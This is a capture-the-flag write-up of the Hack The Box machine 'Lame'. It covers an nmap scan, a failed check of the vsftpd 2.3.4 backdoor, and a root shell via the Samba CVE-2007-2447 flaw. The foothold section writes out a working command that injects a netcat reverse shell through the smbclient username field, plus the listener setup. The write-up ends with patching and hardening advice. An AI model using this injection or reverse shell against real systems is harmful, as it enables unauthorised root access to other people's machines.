Lame — Tabarik Asif

Recon

I started with a standard service scan. The box is old — Debian-era services — so I expected unpatched versions and wasn't disappointed.

$ nmap -sC -sV -oN nmap/initial 10.10.10.3
21/tcp  open  ftp         vsftpd 2.3.4
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
22/tcp  open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open  netbios-ssn Samba smbd 3.0.20-Debian (workgroup: WORKGROUP)
# three attack surfaces immediately: FTP anon login, SSH (probably not vulnable here), and Samba

Four ports worth looking at. FTP accepts anonymous logins, Samba version 3.0.20 is visible in the banner. SSH on 4.7p1 is old but rarely the intended path on HTB easy boxes. I noted all three and started with FTP.

Enumeration

FTP — vsftpd 2.3.4

Anonymous FTP connected immediately. The directory was empty — nothing to grab. But vsftpd 2.3.4 has a famous backdoor (CVE-2011-2523): a smiley face :) appended to the username triggers a bind shell on port 6200. I tested it.

$ ftp 10.10.10.3
Connected to 10.10.10.3.
220 (vsFTPd 2.3.4)
Name (10.10.10.3:root): anonymous
331 Please specify the password.
Password:
230 Login successful.
# directory listing returns nothing — empty share
$ nc 10.10.10.3 6200
(no response — connection refused)
# backdoor not present — this is a patched or non-vulnerable build. Move on.

Port 6200 never opened. The backdoor was not active. I spent about thirty seconds confirming, then moved to SMB rather than continuing to prod a dead end.

SMB — Samba 3.0.20

Samba 3.0.20 is the exact version range affected by CVE-2007-2447. I listed shares to confirm the service was responding normally.

$ smbclient -L //10.10.10.3/ -N
        Sharename       Type      Comment
        ---------       ----      -------
        print$          Disk      Printer Drivers
        tmp             Disk      oh noes!
        opt             Disk
        IPC$            IPC       IPC Service (lame server (Samba 3.0.20-Debian))
        ADMIN$          IPC       IPC Service (lame server (Samba 3.0.20-Debian))

The tmp share with the comment "oh noes!" is a hint, but more importantly the banner confirms Samba 3.0.20-Debian. That version is squarely in the CVE-2007-2447 vulnerable range (3.0.0–3.0.25rc3).

Foothold

CVE-2007-2447 is a pre-auth RCE in Samba's MS-RPC functionality. When the username map script option is configured in smb.conf, Samba passes the supplied username to /bin/sh without sanitizing shell metacharacters. An attacker can inject a backtick subshell directly into the username field of an SMB authentication request and get code execution as whatever user smbd runs as — on this box, that's root.

Key Finding

Samba 3.0.20 passes the authentication username directly to /bin/sh via the username map script — shell metacharacters in the username execute arbitrary commands pre-authentication as the smbd process owner.

I set up a listener and triggered the exploit by injecting a netcat reverse shell into the username field via smbclient. The ./= prefix satisfies the username format check; everything inside the backticks runs in a shell.

# terminal 1 — listener
$ nc -lvnp 4444

# terminal 2 — exploit via username injection
$ smbclient //10.10.10.3/tmp -U './=`nohup nc -e /bin/sh 10.10.14.X 4444`'
session setup failed: NT_STATUS_LOGON_FAILURE
# the auth fails but the shell command already ran — check listener

# back in terminal 1
connect to [10.10.14.X] from (UNKNOWN) [10.10.10.3] 37502
id
uid=0(root) gid=0(root) groups=0(root)

Shell arrived as root. The authentication request fails (expected), but the injected command runs before the auth check returns. I also confirmed this works with the Python PoC from amriunix's CVE-2007-2447 repo and with Metasploit's exploit/multi/samba/usermap_script module — same result either way.

Privilege Escalation

None required. smbd was running as root on this box, so the reverse shell arrived as uid=0 directly. There was no privilege boundary to cross.

$ id
uid=0(root) gid=0(root) groups=0(root)
$ hostname
lame

Flags

User Flag

/home/makis/user.txt

Root Flag

/root/root.txt

Lessons Learned

Don't rabbit-hole on vsftpd 2.3.4 backdoor before confirming port 6200 responds — test fast, then move on. Thirty seconds is enough to discard it.
Samba 3.0.20 is the vulnerable version for CVE-2007-2447; always fingerprint the exact service version during enum, not just the service name.
Pre-auth RCE directly to root means no privesc needed — this highlights exactly why SMB version pinning and patching matters in production environments.
Shell metacharacters in authentication fields are exploitable whenever input reaches /bin/sh unsanitized — this class of bug did not disappear with Samba 3.0.20.

Defender Note

Never run smbd as root. Samba should run as a dedicated low-privilege service account so that even a successful RCE exploit lands with minimal system access rather than immediate root. Patch or disable the username map script option entirely if not in use.